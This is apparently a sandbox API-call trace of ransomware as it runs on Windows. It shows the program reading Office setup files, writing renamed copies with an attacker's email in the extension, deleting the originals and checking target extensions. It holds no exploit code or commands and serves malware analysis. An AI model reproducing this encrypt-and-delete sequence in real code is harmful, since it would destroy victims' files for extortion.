[0037.011] SetEndOfFile (hFile=0x1cc) returned 1 [0037.011] CloseHandle (hObject=0x1cc) returned 1 [0037.011] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.011] SetEndOfFile (hFile=0x160) returned 1 [0037.012] CloseHandle (hObject=0x160) returned 1 [0037.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.012] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 1 [0037.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.013] lstrlenW (lpString=".doc") returned 4 [0037.013] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.013] lstrlenW (lpString=".docx") returned 5 [0037.013] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.013] lstrlenW (lpString=".pdf") returned 4 [0037.013] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.013] lstrlenW (lpString=".xls") returned 4 [0037.013] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.013] lstrlenW (lpString=".xlsx") returned 5 [0037.013] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.013] lstrlenW (lpString=".ppt") returned 4 [0037.013] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.013] lstrlenW (lpString=".zip") returned 4 [0037.013] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.013] lstrlenW (lpString=".rar") returned 4 [0037.013] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.013] lstrlenW (lpString=".bz2") returned 4 [0037.013] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.013] lstrlenW (lpString=".7z") returned 3 [0037.013] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.013] lstrlenW (lpString=".dbf") returned 4 [0037.013] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.013] lstrlenW (lpString=".1cd") returned 4 [0037.014] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.014] lstrlenW (lpString=".jpg") returned 4 [0037.014] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.014] lstrlenW (lpString=".doc") returned 4 [0037.014] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString=".docx") returned 5 [0037.014] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.014] lstrlenW (lpString=".pdf") returned 4 [0037.014] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString=".xls") returned 4 [0037.014] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString=".xlsx") returned 5 [0037.014] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.014] lstrlenW (lpString=".ppt") returned 4 [0037.014] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.014] lstrlenW (lpString=".zip") returned 4 [0037.014] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.014] lstrlenW (lpString=".rar") returned 4 [0037.014] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString=".bz2") returned 4 [0037.014] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString=".7z") returned 3 [0037.014] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.014] lstrlenW (lpString=".dbf") returned 4 [0037.014] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.014] lstrlenW (lpString=".1cd") returned 4 [0037.015] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.015] lstrlenW (lpString=".jpg") returned 4 [0037.015] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.015] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.015] lstrlenW (lpString="SETUP.XML") returned 9 [0037.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0037.016] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2296) returned 1 [0037.016] CloseHandle (hObject=0x160) returned 1 [0037.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 0x20 [0037.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0037.016] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.016] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0037.018] GetLastError () returned 0x0 [0037.018] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x8f8, lpOverlapped=0x0) returned 1 [0037.020] WriteFile (in: hFile=0x1d4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x900, lpOverlapped=0x0) returned 1 [0037.029] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.029] WriteFile (in: hFile=0x1d4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.029] SetEndOfFile (hFile=0x1d4) returned 1 [0037.029] CloseHandle (hObject=0x1d4) returned 1 [0037.030] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.030] SetEndOfFile (hFile=0x160) returned 1 [0037.031] CloseHandle (hObject=0x160) returned 1 [0037.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.031] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 1 [0037.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.031] lstrlenW (lpString=".doc") returned 4 [0037.031] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.031] lstrlenW (lpString=".docx") returned 5 [0037.031] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.031] lstrlenW (lpString=".pdf") returned 4 [0037.031] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.031] lstrlenW (lpString=".xls") returned 4 [0037.031] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.031] lstrlenW (lpString=".xlsx") returned 5 [0037.031] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.031] lstrlenW (lpString=".ppt") returned 4 [0037.031] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.032] lstrlenW (lpString=".zip") returned 4 [0037.032] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.032] lstrlenW (lpString=".rar") returned 4 [0037.032] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString=".bz2") returned 4 [0037.032] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString=".7z") returned 3 [0037.032] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.032] lstrlenW (lpString=".dbf") returned 4 [0037.032] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.032] lstrlenW (lpString=".1cd") returned 4 [0037.032] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.032] lstrlenW (lpString=".jpg") returned 4 [0037.032] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.032] lstrlenW (lpString=".doc") returned 4 [0037.032] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString=".docx") returned 5 [0037.032] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.032] lstrlenW (lpString=".pdf") returned 4 [0037.032] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString=".xls") returned 4 [0037.032] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.032] lstrlenW (lpString=".xlsx") returned 5 [0037.032] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.032] lstrlenW (lpString=".ppt") returned 4 [0037.032] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.033] lstrlenW (lpString=".zip") returned 4 [0037.033] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.033] lstrlenW (lpString=".rar") returned 4 [0037.033] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.033] lstrlenW (lpString=".bz2") returned 4 [0037.033] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.033] lstrlenW (lpString=".7z") returned 3 [0037.033] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.033] lstrlenW (lpString=".dbf") returned 4 [0037.033] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.033] lstrlenW (lpString=".1cd") returned 4 [0037.033] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0037.033] lstrlenW (lpString=".jpg") returned 4 [0037.033] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.033] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.033] lstrlenW (lpString="GrooveMUI.XML") returned 13 [0037.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.455] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=913) returned 1 [0037.455] CloseHandle (hObject=0x174) returned 1 [0037.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 0x20 [0037.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.456] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.456] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.456] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.456] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0037.456] GetLastError () returned 0x0 [0037.456] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x391, lpOverlapped=0x0) returned 1 [0037.458] WriteFile (in: hFile=0x1ec, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0037.459] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.459] WriteFile (in: hFile=0x1ec, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xee, lpOverlapped=0x0) returned 1 [0037.459] SetEndOfFile (hFile=0x1ec) returned 1 [0037.459] CloseHandle (hObject=0x1ec) returned 1 [0037.460] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.460] SetEndOfFile (hFile=0x174) returned 1 [0037.460] CloseHandle (hObject=0x174) returned 1 [0037.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.461] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 1 [0037.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.461] lstrlenW (lpString=".doc") returned 4 [0037.461] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.461] lstrlenW (lpString=".docx") returned 5 [0037.461] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.461] lstrlenW (lpString=".pdf") returned 4 [0037.461] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.461] lstrlenW (lpString=".xls") returned 4 [0037.461] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.461] lstrlenW (lpString=".xlsx") returned 5 [0037.461] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.461] lstrlenW (lpString=".ppt") returned 4 [0037.461] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.461] lstrlenW (lpString=".zip") returned 4 [0037.461] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.461] lstrlenW (lpString=".rar") returned 4 [0037.461] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.461] lstrlenW (lpString=".bz2") returned 4 [0037.461] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.461] lstrlenW (lpString=".7z") returned 3 [0037.462] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.462] lstrlenW (lpString=".dbf") returned 4 [0037.462] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.462] lstrlenW (lpString=".1cd") returned 4 [0037.462] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.462] lstrlenW (lpString=".jpg") returned 4 [0037.462] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.462] lstrlenW (lpString=".doc") returned 4 [0037.462] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString=".docx") returned 5 [0037.462] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.462] lstrlenW (lpString=".pdf") returned 4 [0037.462] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString=".xls") returned 4 [0037.462] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString=".xlsx") returned 5 [0037.462] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.462] lstrlenW (lpString=".ppt") returned 4 [0037.462] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.462] lstrlenW (lpString=".zip") returned 4 [0037.462] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.462] lstrlenW (lpString=".rar") returned 4 [0037.462] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString=".bz2") returned 4 [0037.462] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.462] lstrlenW (lpString=".7z") returned 3 [0037.463] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.463] lstrlenW (lpString=".dbf") returned 4 [0037.463] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.463] lstrlenW (lpString=".1cd") returned 4 [0037.463] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0037.463] lstrlenW (lpString=".jpg") returned 4 [0037.463] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.463] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0037.463] lstrlenW (lpString="SETUP.CHM") returned 9 [0037.463] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.415] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=67190) returned 1 [0040.415] CloseHandle (hObject=0x1b8) returned 1 [0040.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 0x20 [0040.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.416] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.416] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.416] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.416] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup 